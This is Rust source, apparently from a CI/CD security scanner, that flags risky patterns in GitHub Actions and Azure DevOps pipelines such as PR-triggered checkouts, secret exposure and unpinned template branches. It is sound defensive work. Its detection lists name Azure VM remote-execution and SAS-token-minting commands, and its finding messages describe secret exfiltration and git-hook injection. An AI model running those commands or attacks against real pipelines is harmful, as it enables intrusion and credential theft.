969            let len = stack.len();
970            if len == 0 {
971                break;
972            }
973            let (node_id, edge_idx) = stack[len - 1];
974            if edge_idx < delegates_to[node_id].len() {
975                stack[len - 1].1 += 1;
976                let neighbor = delegates_to[node_id][edge_idx];
977                if color[neighbor] == 1 {
978                    // Back edge: cycle found. Collect every node between `neighbor`
979                    // (the cycle start) and `node_id` (the cycle end) along the
980                    // current DFS stack. All stack entries are gray by construction,
981                    // so we walk the stack from `neighbor` to the top.
982                    let cycle_start_idx =
983                        stack.iter().position(|&(n, _)| n == neighbor).unwrap_or(0);
984                    for &(n, _) in &stack[cycle_start_idx..] {
985                        cycle_nodes.insert(n);
986                    }
987                } else if color[neighbor] == 0 {
988                    color[neighbor] = 1;
989                    stack.push((neighbor, 0));
990                }
991            } else {
992                color[node_id] = 2;
993                stack.pop();
994            }
995        }
996    }
997
998    if cycle_nodes.is_empty() {
999        return Vec::new();
1000    }
1001
1002    vec![Finding {
1003        severity: Severity::High,
1004        category: FindingCategory::AuthorityCycle,
1005        path: None,
1006        nodes_involved: cycle_nodes.into_iter().collect(),
1007        message:
1008            "Circular delegation detected — workflow calls itself transitively, creating unbounded privilege escalation paths"
1009                .into(),
1010        recommendation: Recommendation::Manual {
1011            action: "Break the delegation cycle — a workflow must not directly or transitively call itself".into(),
1012        },
1013        source: FindingSource::BuiltIn,
1014        extras: FindingExtras::default(),
1015}]
1016}
1017
1018/// Rule: privileged workflow (OIDC/federated identity) with no provenance attestation step.
1019///
1020/// Scoped to workflows that actually use OIDC/federated identity (an Identity node with
1021/// `META_OIDC = "true"` is present). If no node in the graph has `META_ATTESTS = "true"`,
1022/// emit one Info-severity finding listing the steps with HasAccessTo an OIDC identity.
1023pub fn uplift_without_attestation(graph: &AuthorityGraph) -> Vec<Finding> {
1024    // Scope: only fire when the graph has at least one OIDC-capable Identity
1025    let oidc_identity_ids: Vec<NodeId> = graph
1026        .nodes_of_kind(NodeKind::Identity)
1027        .filter(|n| {
1028            n.metadata
1029                .get(META_OIDC)
1030                .map(|v| v == "true")
1031                .unwrap_or(false)
1032        })
1033        .map(|n| n.id)
1034        .collect();
1035
1036    if oidc_identity_ids.is_empty() {
1037        return Vec::new();
1038    }
1039
1040    // Bail if any node already has META_ATTESTS = true
1041    let has_attestation = graph.nodes.iter().any(|n| {
1042        n.metadata
1043            .get(META_ATTESTS)
1044            .map(|v| v == "true")
1045            .unwrap_or(false)
1046    });
1047    if has_attestation {
1048        return Vec::new();
1049    }
1050
1051    // Collect steps that have HasAccessTo an OIDC identity
1052    let mut steps_using_oidc: Vec<NodeId> = Vec::new();
1053    for edge in &graph.edges {
1054        if edge.kind != EdgeKind::HasAccessTo {
1055            continue;
1056        }
1057        if oidc_identity_ids.contains(&edge.to) && !steps_using_oidc.contains(&edge.from) {
1058            steps_using_oidc.push(edge.from);
1059        }
1060    }
1061
1062    if steps_using_oidc.is_empty() {
1063        return Vec::new();
1064    }
1065
1066    let n = steps_using_oidc.len();
1067    let mut nodes_involved = steps_using_oidc.clone();
1068    nodes_involved.extend(oidc_identity_ids);
1069
1070    vec![Finding {
1071        severity: Severity::Info,
1072        category: FindingCategory::UpliftWithoutAttestation,
1073        path: None,
1074        nodes_involved,
1075        message: format!(
1076            "{n} step(s) use OIDC/federated identity but no provenance attestation step was detected — artifact integrity cannot be verified"
1077        ),
1078        recommendation: Recommendation::Manual {
1079            action: "Add 'actions/attest-build-provenance' after your build step (GHA) to provide SLSA provenance. See https://docs.github.com/en/actions/security-guides/using-artifact-attestations".into(),
1080        },
1081        source: FindingSource::BuiltIn,
1082        extras: FindingExtras::default(),
1083}]
1084}
1085
1086/// Rule: step writes to the environment gate ($GITHUB_ENV / ##vso[task.setvariable]).
1087///
1088/// Authority leaking through the environment gate propagates to subsequent steps
1089/// outside the explicit graph edges. Severity:
1090/// - Untrusted step: Critical (attacker-controlled values inject into pipeline env)
1091/// - Step with secret/identity access: High (secrets may leak into env)
1092/// - Otherwise: Medium (still a propagation risk)
1093pub fn self_mutating_pipeline(graph: &AuthorityGraph) -> Vec<Finding> {
1094    let mut findings = Vec::new();
1095
1096    for step in graph.nodes_of_kind(NodeKind::Step) {
1097        let writes_gate = step
1098            .metadata
1099            .get(META_WRITES_ENV_GATE)
1100            .map(|v| v == "true")
1101            .unwrap_or(false);
1102        if !writes_gate {
1103            continue;
1104        }
1105
1106        // Collect authority targets the step has HasAccessTo
1107        let authority_nodes: Vec<&_> = graph
1108            .edges_from(step.id)
1109            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1110            .filter_map(|e| graph.node(e.to))
1111            .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
1112            .collect();
1113
1114        let is_untrusted = step.trust_zone == TrustZone::Untrusted;
1115        let has_authority = !authority_nodes.is_empty();
1116
1117        let severity = if is_untrusted {
1118            Severity::Critical
1119        } else if has_authority {
1120            Severity::High
1121        } else {
1122            Severity::Medium
1123        };
1124
1125        let mut nodes_involved = vec![step.id];
1126        nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
1127
1128        let message = if is_untrusted {
1129            format!(
1130                "Untrusted step '{}' writes to the environment gate — attacker-controlled values can inject into subsequent steps' environment",
1131                step.name
1132            )
1133        } else if has_authority {
1134            let authority_label: Vec<String> =
1135                authority_nodes.iter().map(|n| n.name.clone()).collect();
1136            format!(
1137                "Step '{}' writes to the environment gate while holding authority ({}) — secrets may leak into pipeline environment",
1138                step.name,
1139                authority_label.join(", ")
1140            )
1141        } else {
1142            format!(
1143                "Step '{}' writes to the environment gate — values can propagate into subsequent steps' environment",
1144                step.name
1145            )
1146        };
1147
1148        findings.push(Finding {
1149            severity,
1150            category: FindingCategory::SelfMutatingPipeline,
1151            path: None,
1152            nodes_involved,
1153            message,
1154            recommendation: Recommendation::Manual {
1155                action: "Avoid writing secrets or attacker-controlled values to $GITHUB_ENV / $GITHUB_PATH / pipeline variables. Use explicit step outputs with narrow scoping instead.".into(),
1156            },
1157            source: FindingSource::BuiltIn,
1158                extras: FindingExtras::default(),
1159});
1160    }
1161
1162    findings
1163}
1164
1165/// Rule: PR-triggered pipeline performs a self checkout.
1166///
1167/// When a PR/PRT-triggered pipeline checks out the repository, attacker-controlled
1168/// code from the fork lands on the runner. Any subsequent step that reads workspace
1169/// files (which is almost all of them) can exfiltrate secrets or tamper with build
1170/// artifacts. Fires only when the graph has a PR-class trigger.
1171pub fn checkout_self_pr_exposure(graph: &AuthorityGraph) -> Vec<Finding> {
1172    // Only fires when the graph has a PR/PRT trigger
1173    let trigger = graph.metadata.get(META_TRIGGER).map(|s| s.as_str());
1174    let is_pr_context = matches!(trigger, Some("pr") | Some("pull_request_target"));
1175    if !is_pr_context {
1176        return vec![];
1177    }
1178
1179    let mut findings = Vec::new();
1180    for step in graph.nodes_of_kind(NodeKind::Step) {
1181        let is_checkout_self = step
1182            .metadata
1183            .get(META_CHECKOUT_SELF)
1184            .map(|v| v == "true")
1185            .unwrap_or(false);
1186        if !is_checkout_self {
1187            continue;
1188        }
1189        findings.push(Finding {
1190            category: FindingCategory::CheckoutSelfPrExposure,
1191            severity: Severity::High,
1192            message: format!(
1193                "PR-triggered pipeline checks out the repository at step '{}' — \
1194                 attacker-controlled code from the fork lands on the runner and is \
1195                 readable by all subsequent steps",
1196                step.name
1197            ),
1198            path: None,
1199            nodes_involved: vec![step.id],
1200            recommendation: Recommendation::Manual {
1201                action: "Use `persist-credentials: false` and avoid reading workspace \
1202                         files in subsequent privileged steps. Consider `checkout: none` \
1203                         for jobs that only need pipeline config, not source code."
1204                    .into(),
1205            },
1206            source: FindingSource::BuiltIn,
1207            // Splitting privileged from PR-checkout jobs is a meaningful
1208            // restructure — Medium effort.
1209            extras: FindingExtras {
1210                time_to_fix: Some(crate::finding::FixEffort::Medium),
1211                ..FindingExtras::default()
1212            },
1213        });
1214    }
1215    findings
1216}
1217
1218/// Rule: ADO variable group consumed by a PR-triggered job.
1219///
1220/// Variable groups hold secrets scoped to pipelines. When a PR-triggered job has
1221/// `HasAccessTo` a Secret/Identity carrying `META_VARIABLE_GROUP = "true"`, those
1222/// secrets cross into an untrusted-contributor execution context.
1223pub fn variable_group_in_pr_job(graph: &AuthorityGraph) -> Vec<Finding> {
1224    // Only fires when the pipeline has a PR trigger
1225    let trigger = graph
1226        .metadata
1227        .get(META_TRIGGER)
1228        .map(|s| s.as_str())
1229        .unwrap_or("");
1230    if trigger != "pull_request_target" && trigger != "pr" {
1231        return Vec::new();
1232    }
1233
1234    let mut findings = Vec::new();
1235
1236    for step in graph.nodes_of_kind(NodeKind::Step) {
1237        let accessed_var_groups: Vec<&_> = graph
1238            .edges_from(step.id)
1239            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1240            .filter_map(|e| graph.node(e.to))
1241            .filter(|n| {
1242                (n.kind == NodeKind::Secret || n.kind == NodeKind::Identity)
1243                    && n.metadata
1244                        .get(META_VARIABLE_GROUP)
1245                        .map(|v| v == "true")
1246                        .unwrap_or(false)
1247            })
1248            .collect();
1249
1250        if !accessed_var_groups.is_empty() {
1251            let group_names: Vec<_> = accessed_var_groups
1252                .iter()
1253                .map(|n| n.name.as_str())
1254                .collect();
1255            findings.push(Finding {
1256                severity: Severity::Critical,
1257                category: FindingCategory::VariableGroupInPrJob,
1258                path: None,
1259                nodes_involved: std::iter::once(step.id)
1260                    .chain(accessed_var_groups.iter().map(|n| n.id))
1261                    .collect(),
1262                message: format!(
1263                    "PR-triggered step '{}' accesses variable group(s) [{}] — secrets cross into untrusted PR execution context",
1264                    step.name,
1265                    group_names.join(", ")
1266                ),
1267                recommendation: Recommendation::CellosRemediation {
1268                    reason: format!(
1269                        "PR-triggered step '{}' can exfiltrate variable group secrets via untrusted code",
1270                        step.name
1271                    ),
1272                    spec_hint: "cellos run --network deny-all --policy requireEgressDeclared,requireRuntimeSecretDelivery".into(),
1273                },
1274                source: FindingSource::BuiltIn,
1275                        extras: FindingExtras::default(),
1276});
1277        }
1278    }
1279
1280    findings
1281}
1282
1283/// Rule: self-hosted agent pool used by a PR-triggered pipeline that also checks out the repo.
1284///
1285/// All three factors present — self-hosted pool + PR trigger + `checkout:self` — combine to
1286/// allow an attacker to land malicious git hooks on the shared runner via a PR. Those hooks
1287/// persist across pipeline runs and execute with full pipeline authority.
1288pub fn self_hosted_pool_pr_hijack(graph: &AuthorityGraph) -> Vec<Finding> {
1289    let trigger = graph
1290        .metadata
1291        .get(META_TRIGGER)
1292        .map(|s| s.as_str())
1293        .unwrap_or("");
1294    if trigger != "pull_request_target" && trigger != "pr" {
1295        return Vec::new();
1296    }
1297
1298    // Check if any Image node is self-hosted
1299    let has_self_hosted_pool = graph.nodes_of_kind(NodeKind::Image).any(|n| {
1300        n.metadata
1301            .get(META_SELF_HOSTED)
1302            .map(|v| v == "true")
1303            .unwrap_or(false)
1304    });
1305
1306    if !has_self_hosted_pool {
1307        return Vec::new();
1308    }
1309
1310    // Check if any Step does checkout:self
1311    let checkout_steps: Vec<&_> = graph
1312        .nodes_of_kind(NodeKind::Step)
1313        .filter(|n| {
1314            n.metadata
1315                .get(META_CHECKOUT_SELF)
1316                .map(|v| v == "true")
1317                .unwrap_or(false)
1318        })
1319        .collect();
1320
1321    if checkout_steps.is_empty() {
1322        return Vec::new();
1323    }
1324
1325    // All three factors present: self-hosted + PR trigger + checkout:self.
1326    // Collect self-hosted pool nodes for the finding.
1327    let pool_nodes: Vec<&_> = graph
1328        .nodes_of_kind(NodeKind::Image)
1329        .filter(|n| {
1330            n.metadata
1331                .get(META_SELF_HOSTED)
1332                .map(|v| v == "true")
1333                .unwrap_or(false)
1334        })
1335        .collect();
1336
1337    let mut nodes_involved: Vec<NodeId> = pool_nodes.iter().map(|n| n.id).collect();
1338    nodes_involved.extend(checkout_steps.iter().map(|n| n.id));
1339
1340    vec![Finding {
1341        severity: Severity::Critical,
1342        category: FindingCategory::SelfHostedPoolPrHijack,
1343        path: None,
1344        nodes_involved,
1345        message:
1346            "PR-triggered pipeline uses self-hosted agent pool with checkout:self — enables git hook injection persisting across pipeline runs on the shared runner"
1347                .into(),
1348        recommendation: Recommendation::Manual {
1349            action: "Run PR pipelines on Microsoft-hosted (ephemeral) agents, or disable checkout:self for PR-triggered jobs on self-hosted pools".into(),
1350        },
1351        source: FindingSource::BuiltIn,
1352        extras: FindingExtras::default(),
1353}]
1354}
1355
1356// ── shared_self_hosted_pool_no_isolation ──────────────────────────────────────
1357//
1358// ADO self-hosted agent pools retain their workspace between pipeline runs.
1359// Without `workspace: { clean: all }` a build that runs on the shared agent
1360// can leave behind malicious files, compiled artefacts, or git hooks that
1361// persist for the next run — which may be a privileged deployment pipeline.
1362//
1363// Microsoft-hosted agents are ephemeral (Image node has no META_SELF_HOSTED).
1364
1365/// Rule G1: ADO self-hosted pool without workspace isolation.
1366///
1367/// Fires when any Image node (pool) in an ADO pipeline has `META_SELF_HOSTED`
1368/// set but does NOT have `META_WORKSPACE_CLEAN` set.  Microsoft-hosted pools
1369/// are ephemeral and are never flagged.
1370pub fn shared_self_hosted_pool_no_isolation(graph: &AuthorityGraph) -> Vec<Finding> {
1371    let platform = graph.metadata.get(META_PLATFORM).map(|s| s.as_str());
1372    if platform != Some("azure-devops") {
1373        return Vec::new();
1374    }
1375
1376    let mut findings = Vec::new();
1377
1378    for pool in graph.nodes_of_kind(NodeKind::Image) {
1379        let is_self_hosted = pool
1380            .metadata
1381            .get(META_SELF_HOSTED)
1382            .map(|v| v == "true")
1383            .unwrap_or(false);
1384
1385        if !is_self_hosted {
1386            continue;
1387        }
1388
1389        let has_clean = pool
1390            .metadata
1391            .get(META_WORKSPACE_CLEAN)
1392            .map(|v| v == "true")
1393            .unwrap_or(false);
1394
1395        if has_clean {
1396            continue;
1397        }
1398
1399        findings.push(Finding {
1400            severity: Severity::High,
1401            category: FindingCategory::SharedSelfHostedPoolNoIsolation,
1402            path: None,
1403            nodes_involved: vec![pool.id],
1404            message: format!(
1405                "Self-hosted pool '{}' has no workspace isolation (workspace: {{clean: all/true}} not set); \
1406                a previous pipeline run can pollute the workspace for the next — including privileged deployment jobs",
1407                pool.name
1408            ),
1409            recommendation: Recommendation::Manual {
1410                action: "Add `workspace: { clean: all }` to every job that uses a self-hosted pool, \
1411                    or migrate to Microsoft-hosted (ephemeral) agents for untrusted builds.".into(),
1412            },
1413            source: FindingSource::BuiltIn,
1414            extras: FindingExtras::default(),
1415        });
1416    }
1417
1418    findings
1419}
1420
1421/// Rule: ADO service connection with broad/unknown scope and no OIDC federation,
1422/// reachable from a PR-triggered job.
1423///
1424/// Static credentials backing broad-scope service connections can carry
1425/// subscription-wide Azure RBAC. When a PR-triggered step has `HasAccessTo` one of
1426/// these, PR-author-controlled code can move laterally into the Azure tenant.
1427pub fn service_connection_scope_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
1428    let trigger = graph
1429        .metadata
1430        .get(META_TRIGGER)
1431        .map(|s| s.as_str())
1432        .unwrap_or("");
1433    if trigger != "pull_request_target" && trigger != "pr" {
1434        return Vec::new();
1435    }
1436
1437    let mut findings = Vec::new();
1438
1439    for step in graph.nodes_of_kind(NodeKind::Step) {
1440        let broad_scs: Vec<&_> = graph
1441            .edges_from(step.id)
1442            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1443            .filter_map(|e| graph.node(e.to))
1444            .filter(|n| {
1445                n.kind == NodeKind::Identity
1446                    && n.metadata
1447                        .get(META_SERVICE_CONNECTION)
1448                        .map(|v| v == "true")
1449                        .unwrap_or(false)
1450                    && n.metadata
1451                        .get(META_OIDC)
1452                        .map(|v| v != "true")
1453                        .unwrap_or(true) // not OIDC-federated
1454                    && matches!(
1455                        n.metadata.get(META_IDENTITY_SCOPE).map(|s| s.as_str()),
1456                        Some("broad") | Some("Broad") | None // unknown scope is also a risk
1457                    )
1458            })
1459            .collect();
1460
1461        for sc in &broad_scs {
1462            findings.push(Finding {
1463                severity: Severity::High,
1464                category: FindingCategory::ServiceConnectionScopeMismatch,
1465                path: None,
1466                nodes_involved: vec![step.id, sc.id],
1467                message: format!(
1468                    "PR-triggered step '{}' accesses service connection '{}' with broad/unknown scope and no OIDC federation — static credential may have subscription-wide Azure RBAC",
1469                    step.name, sc.name
1470                ),
1471                recommendation: Recommendation::CellosRemediation {
1472                    reason: "Broad-scope service connection reachable from PR code — CellOS egress isolation limits lateral movement even when connection cannot be immediately rescoped".into(),
1473                    spec_hint: "cellos run --network deny-all --policy requireEgressDeclared".into(),
1474                },
1475                source: FindingSource::BuiltIn,
1476                        extras: FindingExtras::default(),
1477});
1478        }
1479    }
1480
1481    findings
1482}
1483
1484/// ADO-only rule: a `resources.repositories[]` entry resolves against a
1485/// mutable target — no `ref:` field (default branch) or `refs/heads/<x>`
1486/// without a SHA. Whoever owns that branch can inject steps into every
1487/// consuming pipeline at the next run.
1488///
1489/// Pinned forms that do NOT fire:
1490///   - `refs/tags/<x>` — git tags (treated as immutable in practice)
1491///   - bare 40-char hex SHA — explicit commit pin
1492///   - `refs/heads/<sha>` where the trailing segment is a 40-char hex SHA
1493///
1494/// Mutable forms that DO fire:
1495///   - field absent — defaults to the repo's default branch
1496///   - `refs/heads/<branch>` with a normal branch name
1497///   - bare branch name (`main`, `master`, `develop`, ...)
1498///
1499/// Suppression: a repository entry declared with NO `ref:` field AND no
1500/// in-file consumer (`extends:`, `template: x@alias`, or `checkout: alias`)
1501/// is skipped. This catches purely vestigial declarations — a leftover
1502/// `resources.repositories[]` entry that no one references is not an active
1503/// attack surface. An entry with an explicit `ref: refs/heads/<x>` always
1504/// fires regardless of in-file usage, because the explicit branch ref
1505/// signals an intent to consume (the consumer is typically in an included
1506/// template file outside the per-file scan boundary).
1507pub fn template_extends_unpinned_branch(graph: &AuthorityGraph) -> Vec<Finding> {
1508    let raw = match graph.metadata.get(META_REPOSITORIES) {
1509        Some(s) => s,
1510        None => return Vec::new(),
1511    };
1512    let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
1513        Ok(v) => v,
1514        Err(_) => return Vec::new(),
1515    };
1516
1517    let mut findings = Vec::new();
1518    for entry in entries {
1519        let alias = match entry.get("alias").and_then(|v| v.as_str()) {
1520            Some(a) => a,
1521            None => continue,
1522        };
1523        let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
1524        let repo_type = entry
1525            .get("repo_type")
1526            .and_then(|v| v.as_str())
1527            .unwrap_or("git");
1528        let ref_value = entry.get("ref").and_then(|v| v.as_str());
1529        let used = entry.get("used").and_then(|v| v.as_bool()).unwrap_or(false);
1530
1531        let classification = classify_repository_ref(ref_value);
1532        let resolved = match classification {
1533            RepositoryRefClass::Pinned => continue,
1534            RepositoryRefClass::DefaultBranch => {
1535                // Default-branch entries are only flagged when an in-file
1536                // consumer actually references the alias. Without an explicit
1537                // `ref:` and without a consumer there's no evidence the
1538                // declaration is active — likely vestigial.
1539                if !used {
1540                    continue;
1541                }
1542                "default branch (no ref:)".to_string()
1543            }
1544            RepositoryRefClass::MutableBranch(b) => format!("mutable branch '{b}'"),
1545        };
1546
1547        let pinned_example = format!("ref: <40-char-sha>  # commit on {name}");
1548        findings.push(Finding {
1549            severity: Severity::High,
1550            category: FindingCategory::TemplateExtendsUnpinnedBranch,
1551            path: None,
1552            nodes_involved: Vec::new(),
1553            message: format!(
1554                "ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) resolves to {resolved} — \
1555                 whoever owns that branch can inject steps at the next pipeline run"
1556            ),
1557            recommendation: Recommendation::PinAction {
1558                current: ref_value.unwrap_or("(default branch)").to_string(),
1559                pinned: pinned_example,
1560            },
1561            source: FindingSource::BuiltIn,
1562                extras: FindingExtras::default(),
1563});
1564    }
1565
1566    findings
1567}
1568
1569/// ADO-only rule: a `resources.repositories[]` entry pins to a *feature-class*
1570/// branch — anything outside the platform-blessed set
1571/// (`main`, `master`, `release/*`, `hotfix/*`).
1572///
1573/// Strictly stronger signal than [`template_extends_unpinned_branch`]:
1574///
1575/// * `template_extends_unpinned_branch` fires on *any* mutable branch ref
1576///   (including `main` and `master`) — the abstract "ref isn't pinned to a
1577///   SHA or tag" finding.
1578/// * This rule fires only on the subset that's *worse than main*: a developer
1579///   feature branch (`feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
1580///   `develop`, …) where push protection is typically weaker than the trunk.
1581///
1582/// The two findings co-fire intentionally — they describe different angles of
1583/// the same risk class. `template_extends_unpinned_branch` says "this isn't
1584/// pinned"; this rule adds "and the branch it points to is one any developer
1585/// can push to without a code review gate".
1586///
1587/// Detection inputs are identical to `template_extends_unpinned_branch`:
1588/// `META_REPOSITORIES` JSON array, with the same `used` suppression for
1589/// `ref`-absent entries.
1590///
1591/// Pinned forms (40-char SHA, `refs/tags/<x>`, `refs/heads/<sha>`) do not
1592/// fire — same classification helper as the parent rule.
1593///
1594/// Default-branch (no-`ref:`) entries do not fire from this rule. The default
1595/// branch is conventionally `main`/`master`, and even when it's something
1596/// else the *implicit* default-branch contract carries less risk than an
1597/// explicit feature-branch pin (the default branch usually has the strongest
1598/// protection in the org). The plain "this isn't pinned" surface is left to
1599/// `template_extends_unpinned_branch`.
1600pub fn template_repo_ref_is_feature_branch(graph: &AuthorityGraph) -> Vec<Finding> {
1601    let raw = match graph.metadata.get(META_REPOSITORIES) {
1602        Some(s) => s,
1603        None => return Vec::new(),
1604    };
1605    let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
1606        Ok(v) => v,
1607        Err(_) => return Vec::new(),
1608    };
1609
1610    let mut findings = Vec::new();
1611    for entry in entries {
1612        let alias = match entry.get("alias").and_then(|v| v.as_str()) {
1613            Some(a) => a,
1614            None => continue,
1615        };
1616        let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
1617        let repo_type = entry
1618            .get("repo_type")
1619            .and_then(|v| v.as_str())
1620            .unwrap_or("git");
1621        let ref_value = entry.get("ref").and_then(|v| v.as_str());
1622
1623        // Only explicit refs are candidates here — the parent rule covers the
1624        // ref-absent case via the default-branch path.
1625        let branch = match classify_repository_ref(ref_value) {
1626            RepositoryRefClass::MutableBranch(b) => b,
1627            RepositoryRefClass::Pinned | RepositoryRefClass::DefaultBranch => continue,
1628        };
1629
1630        if !is_feature_class_branch(&branch) {
1631            continue;
1632        }
1633
1634        let pinned_example = format!("ref: <40-char-sha>  # commit on {name}");
1635        findings.push(Finding {
1636            severity: Severity::High,
1637            category: FindingCategory::TemplateRepoRefIsFeatureBranch,
1638            path: None,
1639            nodes_involved: Vec::new(),
1640            message: format!(
1641                "ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) is pinned to feature-class branch '{branch}' — \
1642                 weaker than even an unpinned trunk pin: any developer with write access to that branch can inject pipeline steps without a code review on main"
1643            ),
1644            recommendation: Recommendation::PinAction {
1645                current: ref_value.unwrap_or("(default branch)").to_string(),
1646                pinned: pinned_example,
1647            },
1648            source: FindingSource::BuiltIn,
1649                extras: FindingExtras::default(),
1650});
1651    }
1652
1653    findings
1654}
1655
/// Decides whether an ADO branch name falls *outside* the blessed
/// trunk/release set, i.e. is a "feature-class" branch.
///
/// Blessed (returns `false`):
///
///   - `main`, `master`
///   - `release`, `release/*`, `releases`, `releases/*`
///   - `hotfix`, `hotfix/*`, `hotfixes`, `hotfixes/*`
///
/// Anything else — `feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
/// `develop`, ad-hoc names — returns `true`. An empty name (after
/// normalisation) returns `false`.
///
/// Normalisation: surrounding whitespace is trimmed, any leading
/// `refs/heads/` is removed (matched case-sensitively, before lowercasing),
/// and the remainder is ASCII-lowercased so the name comparison is
/// case-insensitive. Callers normally pass an already-stripped name; the
/// extra stripping keeps this helper usable on its own.
fn is_feature_class_branch(branch: &str) -> bool {
    let name = branch
        .trim()
        .trim_start_matches("refs/heads/")
        .to_ascii_lowercase();
    if name.is_empty() {
        return false;
    }

    let is_trunk = matches!(name.as_str(), "main" | "master");

    // A release/hotfix branch is either exactly the stem or the stem followed
    // by a `/`-separated suffix.
    let is_release_like = ["release", "releases", "hotfix", "hotfixes"]
        .iter()
        .any(|stem| match name.strip_prefix(*stem) {
            Some(rest) => rest.is_empty() || rest.starts_with('/'),
            None => false,
        });

    !(is_trunk || is_release_like)
}
1694
1695// ── Command-line credential leakage helpers ─────────────
1696//
1697// These two rules (`vm_remote_exec_via_pipeline_secret`,
1698// `short_lived_sas_in_command_line`) inspect inline script bodies stamped on
1699// Step nodes by the parser as `META_SCRIPT_BODY`. They are intentionally
1700// heuristic — the goal is reliable detection of the corpus pattern, not 100%
1701// false-positive cleanliness. They're allowed to co-fire on the same step:
1702// each describes a different angle of the same risk class.
1703
/// Names of the Azure VM remote-execution primitives we care about
/// (PowerShell cmdlets and `az` CLI sub-commands).
///
/// Entries are written in lowercase because they are matched as substrings
/// against a lowercased copy of the script body, which makes the match
/// case-insensitive. Order matters: `vm_remote_exec_via_pipeline_secret`
/// quotes the first entry found in the body in its finding message.
const VM_REMOTE_EXEC_TOKENS: &[&str] = &[
    "set-azvmextension",
    "invoke-azvmruncommand",
    "az vm run-command",
    "az vm extension set",
];
1712
/// Substrings that indicate a SAS token has just been minted in this script
/// (PowerShell `New-AzStorage*SASToken` cmdlets and `az storage ... generate-sas`).
///
/// Entries are written in lowercase because they are matched as substrings
/// against a lowercased copy of the script body, which makes the match
/// case-insensitive.
const SAS_MINT_TOKENS: &[&str] = &[
    "new-azstoragecontainersastoken",
    "new-azstorageblobsastoken",
    "new-azstorageaccountsastoken",
    "az storage container generate-sas",
    "az storage blob generate-sas",
    "az storage account generate-sas",
];
1723
/// Argument-passing keywords that put a value on the process command line and
/// thus into ARM extension status / OS process logs.
///
/// Entries are written in lowercase because they are matched as substrings
/// against a lowercased copy of the script body, which makes the match
/// case-insensitive.
const COMMAND_LINE_SINK_TOKENS: &[&str] = &[
    "commandtoexecute",
    "scriptarguments",
    "--arguments",
    "-argumentlist",
    "--scripts",
    "-scriptstring",
];
1734
1735/// Returns the names of pipeline secret/SAS variables (`$(NAME)`) that the
1736/// step references via `HasAccessTo` a Secret. Used to spot interpolation of
1737/// pipeline secrets into command-line strings.
1738fn step_secret_var_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<&str> {
1739    graph
1740        .edges_from(step_id)
1741        .filter(|e| e.kind == EdgeKind::HasAccessTo)
1742        .filter_map(|e| graph.node(e.to))
1743        .filter(|n| n.kind == NodeKind::Secret)
1744        .map(|n| n.name.as_str())
1745        .collect()
1746}
1747
1748/// Returns the names of all Secret nodes a step has `HasAccessTo`.
1749/// Used by the script-aware ADO rules to constrain pattern matches to
1750/// `$(VAR)` references that actually resolve to secrets in this graph.
1751fn step_secret_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<String> {
1752    graph
1753        .edges_from(step_id)
1754        .filter(|e| e.kind == EdgeKind::HasAccessTo)
1755        .filter_map(|e| graph.node(e.to))
1756        .filter(|n| n.kind == NodeKind::Secret)
1757        .map(|n| n.name.clone())
1758        .collect()
1759}
1760
/// Heuristic: does `script_body` appear to interpolate a variable called
/// `var_name`? Two spellings are recognised, both case-insensitively:
///
///   - the ADO macro form `$(var)`
///   - the PowerShell form `$var` (also inside quotes, e.g. `"$var"`), which
///     only counts when the character after the name is not an identifier
///     character, so `$varSomething` is not mistaken for `$var`
///
/// An empty `var_name` never matches.
fn body_interpolates_var(script_body: &str, var_name: &str) -> bool {
    if var_name.is_empty() {
        return false;
    }
    let haystack = script_body.to_lowercase();
    let lowered = var_name.to_lowercase();

    // ADO macro form.
    if haystack.contains(format!("$({lowered})").as_str()) {
        return true;
    }

    // PowerShell form: accept a hit only when it ends at a word boundary
    // (end of body, or a byte that is not `[A-Za-z0-9_]`).
    let needle = format!("${lowered}");
    haystack.match_indices(needle.as_str()).any(|(start, hit)| {
        let following = haystack.as_bytes().get(start + hit.len()).copied();
        !matches!(following, Some(c) if c.is_ascii_alphanumeric() || c == b'_')
    })
}
1791
1792/// Returns true if `script` contains `$(secret)` and that occurrence sits on
1793/// a line whose left-hand side looks like a shell-variable assignment:
1794///   - `export FOO=$(SECRET)`
1795///   - `FOO="$(SECRET)"`
1796///   - `$X = "$(SECRET)"` / `$env:X = "$(SECRET)"`
1797///   - `set -a` followed by an assignment is a softer signal but still flagged
1798///
1799/// Returns false when `$(secret)` is part of a command-line argument
1800/// (e.g. `terraform plan -var "k=$(SECRET)"`) — that's covered by other rules.
1801fn script_assigns_secret_to_shell_var(script: &str, secret: &str) -> bool {
1802    let needle = format!("$({secret})");
1803    for line in script.lines() {
1804        if !line.contains(&needle) {
1805            continue;
1806        }
1807        // Strip everything from `$(secret)` rightward — we only inspect what
1808        // comes before it on this line.
1809        let lhs = match line.find(&needle) {
1810            Some(pos) => &line[..pos],
1811            None => continue,
1812        };
1813        let trimmed = lhs.trim_start();
1814
1815        // bash/sh: `export VAR=`, `VAR=`, `set VAR=`, `declare VAR=`
1816        // Look for `<word>=` (no space allowed before `=`) and no leading
1817        // command pipe / non-assignment indicator.
1818        if matches_bash_assignment(trimmed) {
1819            return true;
1820        }
1821
1822        // PowerShell: `$VAR = "..."`, `$env:VAR = "..."`, `${VAR} = "..."`,
1823        // `Set-Variable -Name X -Value "$(SECRET)"`.
1824        if matches_powershell_assignment(trimmed) {
1825            return true;
1826        }
1827    }
1828    false
1829}
1830
1831/// Returns true if `body` contains any of the SAS-mint token substrings.
1832fn body_mints_sas(body_lower: &str) -> bool {
1833    SAS_MINT_TOKENS.iter().any(|t| body_lower.contains(t))
1834}
1835
1836/// Returns true if `body` contains any of the VM remote-exec tool substrings.
1837fn body_uses_vm_remote_exec(body_lower: &str) -> bool {
